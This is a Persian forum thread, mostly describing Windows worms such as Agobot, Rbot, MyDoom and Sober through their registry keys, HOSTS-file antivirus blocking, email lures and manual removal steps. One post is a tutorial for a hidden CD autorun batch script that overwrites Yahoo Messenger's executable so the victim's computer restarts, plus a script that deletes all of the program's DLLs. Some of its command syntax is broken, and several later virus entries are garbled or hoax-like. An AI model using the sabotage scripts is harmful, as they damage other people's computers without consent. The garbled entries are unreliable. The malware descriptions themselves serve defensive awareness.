این تایپکو برا اشنایی دوستان با ویروسها زدم هرکی درمورد هر ویروسی آشنایی داره اینجا بزاره

ممنون

ويروس W32/Agobot-ADH

نام :: W32/Agobot-ADH
نوع :: کرم
شیوه پخش :: از طریق فایل های به اشتراک گزاشته شده در شبکه
سیستم عامل هدف :: ویندوز
نام مستعار :: WORM_SPYBOT.KV
کارهای پخش ::
1 – دسترسی دیگران به منابع کامپیوتر
2 – دزدیدن اطلاعات
3 – دانلود کردن کد های مخرب از اینترنت
4 – کم کردن قدرت ایمنی سیستم
5 – ضبط صفحه کلید
6 – نصب خود بر روی ریجیستری
7 – از کار انداختن برنامه های آنتی ویروس
شرح::
این کرم حاوی یک در پشتی است که به هکر اجازه استفاده از سیستم را می دهد . و این کرم قدرت پخش خوبی بر روی شبکه های محلی دارد و همچنین برای اولین بار که اجرا می شود خود را بر روی شاخه سیستم کپی می کند . و همچنین این شاخه ها را می سازد ::
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services\
بکدور این کرم از طریق کانال های IRC به هکر اجازه استفاده از منابع سیستم را می دهد و همچنین این کرم می تواند جلوی بازدید و اتصال به سایت های آنتی ویروس را به شکل ایجاد یک فایل HOSTS در مسیر %SYSTEM%\Drivers\etc\HOSTS بگیرد بدین شکل که در این فایل آدرس های زیر را وارد می کنند ::




127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 sophos.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 kaspersky.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 avp.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 networkassociates.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



برای پاک سازی این کرم به صورت دستی باید اول بدنه کرم را از حالت فعالیت خارج کنید که این کار را می توانید با یافتن فایل بدنه کرم در Windows Task Manager  Processes انجام دهید فایل بدنه در بالا ذکر شده است و بعد از طی این مراحل شما باید شاخه های ریجیستری که در بالا پیدا شده است را یافته و مقادیر آن را پاک کنید . اگر نتوانستید فایل بدنه کرم را پیدا کنید باید از ریجستری ویندوز مدد بگیرید و به شاخه RUN یا زیر شاخه های ان رفته و فایل های مشکوک را پیدا کنید و بررسی کنید.

ويروس W32/Rbot-SX

نام :: W32/Rbot-SX
نوع :: کرم
شیوه پخش :: از طریق فایل های به اشتراک گزاشته شده در شبکه
سیستم عامل هدف :: ویندوز
نام مستعار :: WORM_SPYBOT.KV
کارهای پخش ::
1 – دسترسی دیگران به منابع کامپیوتر
2 – دزدیدن اطلاعات
3 – دانلود کردن کد های مخرب از اینترنت
4 – کم کردن قدرت ایمنی سیستم
5 – ضبط صفحه کلید
6 – نصب خود بر روی ریجیستری
شرح::
این کرم دارای کدهای یک بکدور است که این بکدور بر روی کانال های IRC می باشد. این بکدور اطلاعات و دستور ها را از هکر میگیرد و بر روی سیستم انجام می دهد . همچنین این کرم از آسیب پذیری های LSASS و RPC-DCOM و WebDav برای پخش استفاده می کند شماره تخصصی این آسیب پذیری ها به ترتیب MS04-011 و MS03-039 و MS03-007 می باشد . همچنین این کرم هنگامی که برای اولین بار اجرا می شود خود را به نام فایل win32src.exe به صورت مخفی در پوشه سیستم ویندوز ذخیره می کند. همچنین این کرم شاخه های زیر را در ریجستری وارد می کند::




HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Win32 Src Service
win32src.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services
Win32 Src Service
win32src.exe
The worm also creates the following registry entry:
HKCU\Software\Microsoft\OLE
Win32 Src Service
win32src.exe


همچنین این کرم می تواند DoS کند و همچنین می تواند اطلاعاتی مانند CD keys و log keystrokes را بدزدد و همچنین می تواند وارد MS SQL servers شود و فرمانها را وارد کند
برای پاک سازی این کرم به صورت دستی باید اول بدنه کرم را از حالت فعالیت خارج کنید که این کار را می توانید با یافتن فایل بدنه کرم در Windows Task Manager  Processes انجام دهید فایل بدنه در بالا ذکر شده است و بعد از طی این مراحل شما باید شاخه های ریجیستری که در بالا پیدا شده است را یافته و مقادیر آن را پاک کنید .

ويروس W32/Rbot-VM

نام :: W32/Rbot-VM
نوع :: کرم
سیستم عامل هدف :: ویندز
طریقه پخش :: اشتراکات شبکه

وظایف ::
1 - از کار انداختن انتی ویروس
2 - دسترسی دیگران به منابع سیستم
3 - کم کردن قدرت امنیتی سیستم
4 - ضبط صفحه کلید
5 - نصب خود بر روی صفحه کلید

تشریح ::
این کرم می تواند از کانال های IRC به هکر اجازه استفاده از سیستم قربانی را بدهد . همچنین این کرم از آسیب پذیری های DCOM-RPC و LSASS برای پخش خود استفاده می کند . این کرم خود را با نام فایل crmss.exe در شاخه سیستم ویندز کپی می کند . همچنین این شاخه ها را در رجیستری می سازد ::



HKLM\Software\Microsoft\Windows\CurrentVersion\Run
xpupdate
updates.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services
xpupdate
updates.exe

توسط: سید آرش حسینیان

نام :: W32/MyDoom-BD
سیستم عامل هدف :: ویندوز
طریقه پخش :: میل
نام مستعار :: Email-Worm.Win32.Mydoom.am و W32/Mydoom.bd@MM و WORM_MYDOOM.BD

وظایف ::
1 - از کار انداختن آنتی ویروس ها
2 - فرستادن خود به واسطه میل های آلوده
3 - آلوده کردن کامپیوتر
4 - جعل آدرس فرستنده میل

تشریح ::
این کرم خود را در شاخه Temp ویندوز به نام فایل java.exe ذخیره میکند . و این شاخه ها را در رجیستری می سازد ::
HKLM\Software\Microsoft\Windows\CurrentVersion\Run \JavaVM
HKCU\Software\Microsoft\Windows\CurrentVersion\Run \JavaVM
و همچنین فایلی به نام services.exe می سازد . این فایل شامل کد های بکدور است . این کرم همچنین برای یافتن آدرس های میل فایل های PL*, PH*, TX*, HT*, ASP, TBB, SHT و WAB, ADB و DBX را می گردد بر روی سیستم قربانی . همچنین این کرم دوری می کند از فرستادن میل به آدرس هایی که رشته های زیر را داشته باشند ::



mailer-d
spam
abuse
master
sample
accoun
privacycertific
bugs
listserv
submit
ntivi
support
admin
page
the.bat
gold-certs
ca
feste
not
help
foo
no
soft
site
rating
me
you
your
someone
anyone
nothing
nobody
noone
info
winrar
winzip
rarsoft
sf.net
sourceforge
ripe.
arin.
google
gnu.
gmail
seclist
secur
bar.
foo.com
trend
update
uslis
domain
example
sophos
yahoo
spersk
panda
hotmail
msn.
msdn.
microsoft
sarc.
syma
avp


موضوع میل های آلوده از لیست زیر انتخاب می شوند ::



hello
hi
error
status
test
report
delivery failed
Message could not be delivered
Mail System Error - Returned Mail
Delivery reports about your e-mail
Returned mail: see transcript for details
Returned mail: Data format error
همچنین فایل های ضمیمه به نام های زیر هستند ::
readme
instruction
transcript
mail
letter
file
text
attachment
document

توسط: سید آرش حسینیان

بابك جان اگه ويروسش رو بتوني پيدا كني و بزاري خيلي خوب ميشه.
به هر حال ممنون.

ويروس VBS/Mcon-G

نام :: VBS/Mcon-G
نام مستعار :: VBS.Mcon.c و VBS/Pica.worm.gen و VBS.Sorry.A و VBS_MCON.A
سیستم عامل هدف :: ویندوز
نوع :: کرم
طریقه پخش :: چت و اشتراکات شبکه

وظایف ::
1 - نصب خود بر روی رجیستری

تشریح ::
این کرم از کانال های IRC جابجا می شود . هنگامی که اجرا می شود خود را در شاخه هایی که در نام انها startup استفاده شده باشد به نام ttfload.vbs کپی میکند و شاخه های زیر را در رجیستری می سازد ::




HKLM\Software\Microsoft\Windows\CurrentVersion\Run
ttfload
"wscript.exe \Fonts\ttfload.vbs"
HKCU\Software\Microsoft\Windows Scripting Host\Settings
Timeout
0
HKCU\Software\Microsoft\Windows Script Host\Settings
Timeout

همچنین وقتی که اجرا شد این پیغام را نمایش می دهد ::
INVALID FILE FORMAT
این کرم این شاخه را هم تغییر می دهد ::
HKLM\Software\Microsoft\Internet Explorer\Main\
Start
"[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]





توسط: سید آرش حسینیان

W32/Agobot-PI

نام :: W32/Agobot-PI
نوع :: کرم
طریقه پخش :: اشتراکات شبکه
سیستم عامل هدف :: ویندوز
نام مستعار :: Backdoor.Win32.Agobot.jg

وظایف ::
1 - از بین بردن پردازش برنامه های آنتی ویروس
2 - دسترسی دیگران به منابع سیستم
3 - دزدین اطلاعت سیستم
4 - دانلود کد از اینترنت

تشریح ::
این کرم زمانی که اجرا می شود خود را با نام فایل Ksrv32.exe در شاخه سیستم ویندز کپی می کند . همچنین این شاخه ها را در رجیستری می سازد ::




HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Ksrv32
Ksrv32.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services
Ksrv32
Ksrv32.exe


همچنین این کرم حاوی کد های تروجان گونه هستند که از طریق کانال های IRC به هکر اجزاه کار های زیر را می دهند ::




harvest email addresses
steal product registration information for certain software
take part in Distributed Denial of Service (DDoS) attacks
scan networks for vulnerabilities
download/execute arbitrary files
start a proxy server (SOCKS4/SOCKS5)
start/stop system services
monitor network communications (packet sniffing)
add/remove network shares
send email
log keypresses


همچنین این کرم از پردازش انتی ویروس ها جلو گیری می کند و همچنین دسترسی به سایت های زیر را برای کاربر غیر ممکن می کند ::




127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 sophos.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 kaspersky.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 avp.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 networkassociates.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




توسط: سید آرش حسینیان

ويروس W32/Rbot-UW

نام :: W32/Rbot-UW
نوع :: کرم
طریقه پخش :: اشتراکات شبکه
سیستم عامل هدف :: ویندوز
شدت پخش ::

وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - دانلود کد از اینتر نت
4 - کم کردن قدرست امنیت سیستم
5 - عوض کردن کلمات عبور
6 - ضبط صفحه کلید

تشریح ::
این کرم همچنین شامل کد های تروجان مانندی است که از طریق کانال های IRC کار می کند . کار این کرم ساختن یک اکانت در سطح ادمین است و دزدن اطلاعات و اطلاعات مانند کلمات عبور سریال برنامه ها و باز ها و همچنین حملات D.O.S و همچنین ضبط صفحه کلید . و از کار انداختن آنتی ویروس ها و دیوار اتش ها و همچنین این کرم شاخه های زیر را در رجیستری می سازد ::




HKLM\Software\Microsoft\Windows\CurrentVersion\Run \
Default =
lsassM.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services\
Default =
lsassM.exe

توسط: سید آرش حسینیان

ويروس W32/Sdbot-TB

نام :: W32/Sdbot-TB
نوع :: کرم
سیستم عامل هدف :: ویندوز
راه پخش :: برنامه های گفتمان (چت)

کارها ::
1 – دسترسی هکر به منابع سیستم
2 – دانلود کردن کدهای خود از اینترنت
3 – ضبط صفحه کلید
4 – نصب خود بر روی ریجستری
5 – دزدین اطلاعات
6 – کم کردن قدرت امنیت سیستم

شرح ::
این کرم از راه کانال های IRC خود را انتقال می دهد . و حاوی کد بکدوری است که دسترسی کامل هکر را به سیستم میدهد . این کرم در اولین بار که اجرا می شود فایل wupdated.exe را بر روی شاخه سیستم ویندوز می سازد . و بر روی سیستم های NT خود را Wupdated معرفی می کند که شباهت زیادی به سرویس Windows Update Service دارد و همچنین شاخه های زیر را در ریجستری می سازد ::
HKLM\SYSTEM\CurrentControlSet\Services\Wupdated\Se curity
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WUP DATED
همچنین این کرم سعی می کند خود را از طریق اشتراکات شبکه جابجا کند . همچنین این کرم یک HTTP proxy server بر روی سیستم قربانی نصب می کند . و می تواند حملات DoS کند . و همچنین اطلاعات سیستم را می دزدد و همچنین انها را در فایلی به نام keys.txt در شاخه سیستم قرار می دهد و به هکر می رساند . همچنین این کرم سعی می کند خود را از طریق جابجایی فایل های DCC در کانال های IRC انتقال دهد . با متن پیغام زیر ::




The message text can be of any of the following:
dude, chk out this new AdminMOD exploit, it gives you admin
privs on any server running AM, plz dont give it out tho, thnx
i just caught this guy cheating with the Cheat Scanner in the
CAL Demo Viewer, chk it out
omfg this is so cool! i just caught this guy cheating with
this cal demoviewer or whatever its called, here's a copy of it
Here is the new CAL Demo Viewer, it includes
همچنین فایل های آلوده عبارت از ::
AdminMOD-ExploitHack.exe
cheater-caught.pif
CAL-DemoViewer.exe
Setup.exe




توسط: سید آرش حسینیان

W32/Rbot-UU

نام :: W32/Rbot-UU
نام مستعار :: Backdoor.Win32.Rbot.gen و W32/Sdbot.worm.gen.j
طریقه پخش :: اشتراکات شبکه
سیستم عامل هدف :: ویندوز
شدت پخش ::

وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دانلود کد های خود از اینترنت
3 - کم کردن قدرت امنیت سیستم
4 - نصب خود بر روی رجیستری
5 - استفاده از سیستم آسیب پذیری

تشریح ::
این کرم حاوی کد های تروجان مانندی است که از طریق کانال های IRC اجازه نفوذ به هکر می دهد . این سرویس در پشت پردازش ها اجرا می شود به دور از چشم کاربر . همچنین این کرم خود را در داخل شاخه سیستم ویندوز به نام فایل USBHARDWARE32C.EXE کپی می کند . و این شاخه ها را برای اجرا مجدد خود می سازد ::




HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services
HKCU\Software\Microsoft\Windows\CurrentVersion\Run


همچنین این مقدار ها را تغییر می دهد ::




"HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM = "N
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrict anonymous = "1


توسط: سید آرش حسینیان

ابتدا یک notepad ایجاد نموده , سپس اطلاعات لازم را در آن می نویسیم.


..cd

این دستورما را از مسیری که هستیم یک پله به عقب می رویم.مثلا c:\hamid\123را به c:\hamid تبدیل می کند.


\cd

این دستور ما را از مسیری که هستیم به ابتدای آدرس می برد. مثلا c:\hamid\123\ali را به \:c تبدیل می کند.


:c

این دستور در هنگام اجرای برنامه ما را به درایو C می برد. که به جای آن می توان نام های دیگر گذاشت.


cd name

با این دستور به folder مورد نظر می رویم.


del

با این دستور فایل های مورد نظر را می توان پاک کرد, که شامل زیر دستور های زیر می باشد.

del\q : این دستور فایل مورد نظر را بدون پرسیدن اینکه این فایل را پاک کنم یا خیر پاک می کند.

del\s : این دستور فایل مورد نظر را در تمام فولدرهای زیر شاخه پاک می کند.

مثلا
c:\hamid\del\q hamid.txt

copy

با این دستور می توانیم عمل کپی را انجام دهیم.مثلا c:\hamid\hamid.txt copy c:\ali یا

c:\hamid\*.* copy c:\ali

md

با این دستور می توانیم یک folder بسازیم.مثلا c:\hamid\md ali و بدین ترتیب در فولدر hamid فولدر ali را ساختیم.

ren

با این دستور می توانیم عمل rename را انجام دهیم. مثلا c:\hamid ren hamid.txt ali.txt . ما اسم حمید را به علی تغییر دادیم.


attrib

با این دستور ما می توان خصلت فایل را تغییر داد. یعنی می توان فایل را پنهان یا فقط خواندنی یا سیستمی تبدیل کرد, که به این صورت معرفی می شوند...


attrib +h : این دستور فایل را پنهان می کند. و با گذاشتن - به جای + فایل را از حالت پنهان خارج می کند.مثلا c:\ hamid\attrib +h hamid.txt

attrib +r : این دستور فایل را read-only می کند.

attrib +s : این دستور فایل را system می کند.

shutdown

با این دستور می توانید عمل restart و shutdown و log off را انجام دهید.

shutdown -r : با این دستور کامپیوتر restart می شود.

shutdown -t xx : با این دستور کامپیوتر بعد از زمان xx , ریست میشود.

خوب , همانطور که متوجه هستین همه این فرامین , فرمان های dos هستند.برای آشنایی با جزئیات کامل دستورهای بالا ای دستور را در command prompt ویندوز بنویسید.(start/run/cmd )


مثلا c:\copy help

بعد از نوشتن دستور مورد نظر به قسمت file/save az رفته و با name.bat آن را save کنید.پسوند باید bat باشد حتما.

فایل مورد نظر را می توان طبق آموزش قبلی در autorun یک cd گذاشت.

حال به مثال زیر که ما در آن فایل hamid.bat را که حاوی دستورات زیر می باشد را مثلا در autorun سی دی می گذاریم.تا بعد از اجرای automaticجایگزین فایل ypager.exe که فایل اجرایی yahoo messenger هست شود تا هر وقت کاربر روی فایل ypager.exe کلیک کرد,کامپیوترش restart شود.ما در cd خودمان فایل hamid.bat وhz007.bat را با دستورات زیر ساخته و به صورت hidden رایت می کنیم. در فایل autorun که ساختیم در قسمت open نام hz007.bat را می نویسیم.


hamid.bat
c:

shutdown -r


hz007.bat
copy hamid.bat C:\Progra~1\Yahoo!\Messen~1\

ren hamid.bat ypager.exe



نکات مهم :

1. چون دستورات dos هستن نباید تعداد حروف بیشتر از 8 حرف باشند.ما 6 حرف از آن را می نویسیم و به جای بقیه آن می نویسیم (1~) .

2.اگر در نظر دارید از فایل های سیستمی در winxp پاک کنید. بدانید که فایل ها در winxp چند ثانیه پس از پاک شدن , دوباره بازسازی می شوند تنها راه گذاشتن دستور shutdown بعد از دستور del می باشد.

3.اگر در نظر دارید فایلی که hidden است را پاک یا کپی کنید آن را بایدحتما از حالت hidden خارج کنید.



مثالی دیگر :::

در این مثال ما به درایو C می رویم و به شاخه c:\program files\yahoo!\messenger می رویم و یک folder با نام hamidمی سازیم , سپس یک پله بر می گردیم و تمام فایل های hidden را از hidden بودن خارج می کنیم وسپس تمام فایل های با پسوند dll را پاک می کنیم.


c:

cd progra~1

cd yahoo!

cd messen~1

md hamid

cd..

attrib -h *.*

del\q *.dll

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اینو دیدم گفتم بزارم استفاده کنین

نحوه پاکسازی ویروس W32/Sober.r@MM

نام ویروس : W32/Sober.r@MM
نوع : ویروس
میزان حجم : 113,551
طریقه پخش : E-mail

تشریح :
این کرم خود را از طریق فایل های ضمیمه به نام های KlassenFoto.zip و pword_change.zip و screen_photo.zip و privat-photo.zip پخش می کند .
درون این فایل های Zip شده فایل های اجرایی به نام PW_Klass.Pic.packed-bitmap.exe و Screen_Photo.jpeg-graphic1.exe
این کرم در مرحله اول شاخه های زیر را در رجیستری تهیه می کند :



• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\
Run " WinINet" =C:\WINDOWS\ConnectionStatus\services.exe
• HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\
Run "_WinINet"=C:\WINDOWS\ConnectionStatus\services.exe

سپس فایل های زیر را می سازد :



• c:\WINDOWS\ConnectionStatus\netslot.nst
• c:\WINDOWS\ConnectionStatus\services.exe
• c:\WINDOWS\ConnectionStatus\socket.dli

سپس فایل های با حجم 0 درست می کند با نام و آدرس های زیر :



• c:\WINDOWS\system32\bbvmwxxf.hml
• c:\WINDOWS\system32\gdfjgthv.cvq
• c:\WINDOWS\system32\langeinf.lin
• c:\WINDOWS\system32\nonrunso.ber
• c:\WINDOWS\system32\rubezahl.rub
• c:\WINDOWS\system32\seppelmx.smx


سپس پورت های شماره TCP 587 و TCP 37 و صفحه خانگی قربانی را عوض می کند .
تیم irvirus حداکثر تا 12 ساعت دیگر پج آنتی ان را به زبان فارسی برای شما عزیزان قرار می دهد .
برای پاک سازی دستی هم می توانید از طریق Safe mode فایل های یاد شده را پاک و شاخه ایجاد شده را در رجیستری پاک کنید .


منبع : irvirus

آشنايي با MYDOOM.AO، كرم شكارچي

MYDOOM.AO تلاش مي كند از طريق موتورهاي جستجوگر اينترنتي آدرس هاي ايميل را جمع آوري كند و خود را براي همه آنها بفرستد. اين كرم اينترنتي نشان داد كه انتشار آدرس ايميل در اينترنت مي تواند براي كاربران مشكلات زيادي ايجاد كند.

عليرغم توصيه هاي مكرر، كاربران به راحتي آدرس ايميل خود در بسياري از سايت هاي اينترنتي ثبت مي كنند چرا كه در بعضي مواقع ثبت ايميل براي ورود به يك سايت و يا گرفتن اخبار اينترنتي ضروري است و اين امر باعث مي شود اين كرم با يك جستجوي ساده هزاران آدرس ايميل را جمع آوري كند.

به نظر مي رسد سريعترين راه حل براي در امان بودن از شر اينگونه كرم هاي اينترنتي و اسپم ها، ثبت آدرس ايميل بصورتي است كه يك سيستم اتوماتيك نتواند از آن استفاده كند اما افراد متوجه اشتباه بودن آن بشوند مثلا با اضافه كردن عبارت NOSPAM به آدرس ايميل مانند usuarioNOSPAM@dominio.com"" كسي كه ايميل شما را
مي گيرد متوجه مي شود كه كلمه NOSPAM به چه دليل وارد شده ، اما باز هم چون آدرس DOMAIN شناخته شده است نامه هاي اتوماتيك به Mail Server برگردانده مي شوند. بنابراين بهترين راه حل اضافه كردن حروف و يا نشانه هايي به آدرس ايميل است مثلا user@d_o_m_a_i_n.com و براي اينكه شخص مورد نظر را متوجه كنيد مي توانيد عبارتي مثل "مي توانيد جواب خود را با برداشتن خطوط فاصله بفرستيد". را به ايميل خود اضافه كنيد. در اين صورت هيچ سيستم اتوماتيكي نمي تواند براي شما ايميل بفرستد.

اولين بار كه يك كرم اينترنتي ( Mydoom.N ) در جولاي 2004 از موتورهاي جستجوگر براي يافتن آدرس هاي ايميل استفاده كرد، مسئولان اين جستجوگرها به فكر يافتن اصلاحيه ايي براي موتورهاي جستجوگر افتادند. در نتيجه در حال حاضر اگر شما تنها علامت "@" را جستجو كنيد هيچ نتيجه اي بدست نمي آوريد. ( در حاليكه قبلا با اين جستجو هزاران مورد جواب مي گرفتيد)

فعاليت كرم اينترنتي Mydoom.AO به راحتي قابل پيش بيني است. اين كرم بدون اينكه كاربر متوجه شود نخست در فايلهاي داخلي كامپيوتر آلوده به دنبال آدرس هاي ايميل مي گردد ( كاري كه اغلب كرم هاي اينترنتي انجام مي دهند )‌. سپس يكي از domain هاي ايميل هايي را كه پيدا كرده انتخاب مي كند و آنرا در موتورهاي جستجوگر مانند Google ، Yahoo و ... جستجو مي كند. وقتي آدرس هاي مورد نظر را جمع آوري كرد نسخه هايي از خود را به آنها مي فرستد.

در حال حاضر تكنولوژي پيش گيرانه TruPreventTM محصول شركت آنتي ويروس پاندا قابليت شناسائي هر گونه عمليات مشكوك و غير مشكوك كامپيوتر را دارد. بنابراين قبل از اينكه عمليات مخربي صورت گيرد مي تواند آن را متوقف كند.

مطالب شوما كاملآ گويا هست و از اينكه همه مي توانند از اين مطالب يه طور كامل بهره مي گيرندخوشنود مي باشم و اميد وارم مطالب شوما همشه به روز باشد .

ویروس های کامپیوتری و مبارزه با آنها
·


ویروس ها رویتن های نرم افزاری بسیا هوشمند می باشند که در دیسک سخت یا دیسکتها مستقر می شوند.ویروس ها نام و لغب دارند ولی در یک فایل مستقل قرار نمی گیرند، لذا تحت کنترل و نظارت سیستم عامل در نمی آیندمترصد فرصت می شوند تا بدون اجازه سیستم عاملو به طور خود سر فعال شده و خرابکاری کنند. ویروس ها از دید ظاهری کاربران نیز پنهان می مانند.
ویروس ها بدون اجازه و کنترل سیستم عامل، در فرصت های متقضییک کپی از محتوای خود را به حافظه اصلی رسانده و به اجرا در می آورد. اکثر ویروس ها قادرند با چسباندن کپی خود به فایل های دیگرتکثیر شوند. بیشتر ویروس ها به فایل های اجرایی متصل می شوند تا هم بتوانند این فایل ها را آلوده کنند و هم محتوای حافظه اصلی تغییر دهند تا نرم افزارهای در حال اجرا، اطلاعات نادرستی به دیسک سخت ها یا دیسکت ها یا CDهامنتقل کنند.
علاوه بر ویروس های معمولی دو دسته ویروس خطرناکتر وجود دارند که مطابق زیر، عمل می نمایند:
· دسته اول، BOOT SECTOR ناحیه C: یا دیسکت ها را مورد حمله قرار می دهد و عمل راه اندازی سیستم را مختل می کنند.
· دسته دوم،PARTITION Table دیسک سخت را مورد تهاجم قرار می دهند و سیستم عامل را برای شناسایی ناحیه ها دچار اشکال می کنند.
حال با معرفی چند ویروس به این بحث خاتمه می دهیم:


ویروس MISS WORD


کرم کامپیوتری MISS WORD از طریق ایمیل به دست کاربران می رسد که مشخصات آن عبارتند از:

Subject Miss Word Body: Hi (Your Name)
Enjoy The Latest Pictures of Miss Word From Various Country Attached Mwrld.EXE

اگر کاربر روی ضمیمه کلیک کند، گربه ای کیک به دست با متن زیر ظاهر می شود:

“I fall more in love with you cach day”

و سپس این ویروس خود را تکثیر می کند و به آدرس کلیه اشخاصی که در Address Book هستند، فرستاده می شود.
اگر این ویروس فعال شود، محتواتی دریو C: را از بین می برد.
برای مقابله با این ویروس، کاربر باید نکان زیر را رعایت کند:
1) ضمیمه ایمنی OUT LOOK را DOWN LOAD کند.
2) Scripting host ویندوز را خاموش کند.
3) از باز کردن ضمایم نامه ها خودداری کند.
4) سیستم خود را SCANکند.
سیستم Anti Virous خود را به روز کند.


ویروس V32/ choke


این کرم که با نام های V32/ chocke.Worm و Worm.chocke و Win32.chocke معرفی گردیده و از طریق برنامه MSM Messenger منتقل می شود.اگر فایلی با این نام ها یا Shoot presidentbush.exe به کاربر برسد، به هیچ وجه نباید آن را باز کند، زیرا با باز کردن فایل، پیغام زیر، ظاهر می شود:
“Chocke Copyright 1886 … AMAD CRISTIAN
GO talk swear words about God
You all will die stupid humans.
You fools didn’t see what you have done by slut go talk shit about me.
(Call me a psychophant but I respect the creator of life…) consider your earth

کرم به محض فعال شدن، مانع اجرای بعضی برنامه ها در درایوC: می گردد.


ویروس BILLGATES


این ویروس که نام مشخصی ندارد به آدرس کاربران فرستاده می شود و اگر کاربری این نامه را باز کند، یک کپی از نامه به آدرس بیل گیتس در gates@microsoft.com فرستاده می شود.



ویروس Hiderun.exe


